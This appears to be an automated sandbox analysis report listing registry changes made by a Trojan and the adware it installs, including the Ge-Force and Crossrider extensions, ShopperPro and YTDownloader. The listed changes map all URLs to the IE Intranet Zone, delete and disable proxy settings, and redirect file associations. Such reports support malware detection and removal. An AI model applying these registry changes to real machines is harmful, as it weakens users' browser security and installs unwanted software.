The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ping.exe:2088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 40 14 D6 70 DB 16 28 47 57 87 CA BC C1 2B 59"

The process ping.exe:2548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 29 ED 99 5C 41 BE A5 BC 98 C2 8A 75 D9 0A 2C"

The process ping.exe:2312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 4B A8 69 3C 0C A4 B5 8F 6B 63 21 84 5B 0D FE"

The process ping.exe:3196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E AC 49 7E B5 8C 87 10 76 73 DE 71 6B B8 0B 93"

The process ping.exe:3620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 55 44 F2 A2 74 D8 49 56 F6 9D F7 EC A8 CF 89"

The process ping.exe:4068 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 57 4B 1D 27 AB 83 44 17 B4 4D 73 3B 2E 89 12"

The process ping.exe:4076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 8A 38 F6 12 A3 B6 C2 4E 08 C3 A1 C2 E1 01 9C"

The process ping.exe:968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B C3 90 D6 8D 38 A5 17 7A 83 D0 4C A5 34 43 F9"

The process ping.exe:2700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 16 03 69 A8 ED 8D 83 00 C5 18 EA 58 27 C8 EA"

The process ping.exe:3684 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 9B 37 43 7E 9F 02 00 DB 94 44 61 A1 54 81 92"

The process ping.exe:3400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 66 2E E3 87 EE 73 72 16 28 2B CB 12 81 40 5A"

The process ping.exe:3524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 A8 C5 F4 24 4A C2 9E 6C 72 A4 6D E9 FA 75 FF"

The process ping.exe:2704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 71 98 EA AB 90 3E 26 21 F7 E8 02 47 EA 0C 07"

The process ping.exe:2300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 8E 6D FB CF 11 40 33 82 F2 73 B7 80 BE AE 28"

The process ping.exe:2972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C D1 85 EA 52 C1 6C A7 CB 32 B0 1F 00 80 EF 2E"

The process ping.exe:3148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 2E 0A 3D 3C 18 8A 9D C4 3D C5 0F 59 AA 1B CE"

The process ping.exe:2236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 B7 C7 4B 14 90 0B 02 B5 29 19 5D B4 20 A9 2B"

The process ping.exe:2976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 9B 42 6B 5C D3 14 03 BA 37 F0 66 40 90 68 AC"

The process ns19.tmp:2004 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process 8e4b80.exe:3080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-ForcePlus v3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"15270.bat" = "15270"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 CA 3A C5 80 04 A3 33 9D 89 82 8D C1 D6 C0 63"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-ForcePlus v3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ins_sense.exe:2532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 96 4A 67 AA CC 86 EE 03 9F 27 28 E3 93 DB 36"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"7.exe" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process Rpuxtvuh.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"UninstallString" = "%Program Files%\Ge-Force\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayName" = "Ge-Force"

[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "67a1823aa892cacdb48c5c33d8b81ea2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrAppId" = "70881"
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrPublisherId" = "21836"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\InstalledBrowserExtensions\Webar]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "03a471124f01b8b4a21fa91e866e62edIE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "03a471124f01b8b4a21fa91e866e62edIE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 AF 3A C7 75 9D 82 2F C6 4F B3 37 0F F4 B5 D3"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "67a1823aa892cacdb48c5c33d8b81ea2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"Publisher" = "Webar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process find.exe:2064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process sc.exe:3412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process sc.exe:3732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process sc.exe:4016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process net.exe:4004 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process net.exe:3552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process setup.exe:2172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B A4 96 6E 86 0A 4A E6 20 83 24 A3 54 8B 74 A5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"UninstallString" = "%Program Files%\ShopperPro\SPremove.exe"
"DisplayIcon" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro]
"DisplayName" = "Shopper-Pro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ShopperPro.exe]
"(Default)" = "%Program Files%\ShopperPro\ShopperPro.exe"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\AccDownload.dll,"

The process setup.exe:3240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"ExeLocation" = "%Program Files%\YTDownloader\Converter.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\AniGIFPpg.AniGIFPpg]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "IAniGIF"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKCR\AniGIFCtrl.AniGIF\CurVer]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"intl" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&LangID=x&Ext=%s"

[HKLM\SOFTWARE\YTDownloader]
"ExeLocation" = "%Program Files%\YTDownloader\YTDownloader.exe"
"Version" = "1.0.8654.1204"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"UninstallString" = "%Program Files%\YTDownloader\YTDUninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&LangID=x&Ext=%s"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"FFUseConverter" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"Publisher" = "YTDownloader"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ToolboxBitmap32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx, 1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\AniGIFPpg2.AniGIFPpg2.1]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCR\AniGIFCtrl.AniGIF]
"(Default)" = "Animation GIF Control"

[HKCR\AniGIFPpg.AniGIFPpg.1]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"Version" = "1.5"
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\YTDownloader]
"Aff" = "obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,"

[HKCR\AniGIFPpg.AniGIFPpg.1\CLSID]
"(Default)" = "{6DC82D15-92F2-11D1-A255-00A0C932C7DF}"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\0\win32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC DC 36 90 33 67 3F 91 5D 01 67 19 AE 94 2A 1C"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"Install" = "%Program Files%\YTDownloader\"

[HKCR\AniGIFPpg2.AniGIFPpg2.1\CLSID]
"(Default)" = "{61AB12E1-A5FF-11D1-B2E9-444553540000}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb\0]
"(Default)" = "&Properties,0,2"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"Version" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AniGIFPpg.AniGIFPpg\CurVer]
"(Default)" = "AniGIFPpg.AniGIFPpg.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"XMLLookup" = "http://www.fileextensionpro.com/redir.aspx?s=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&LangID=x&Ext=%s&"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\FLAGS]
"(Default)" = "2"

[HKCU\Software\YTDownloader]
"Version" = "1.0.8654.1204"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayIcon" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"net.exe" = "Net Command"

[HKCR\AniGIFPpg2.AniGIFPpg2\CurVer]
"(Default)" = "AniGIFPpg2.AniGIFPpg2.1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

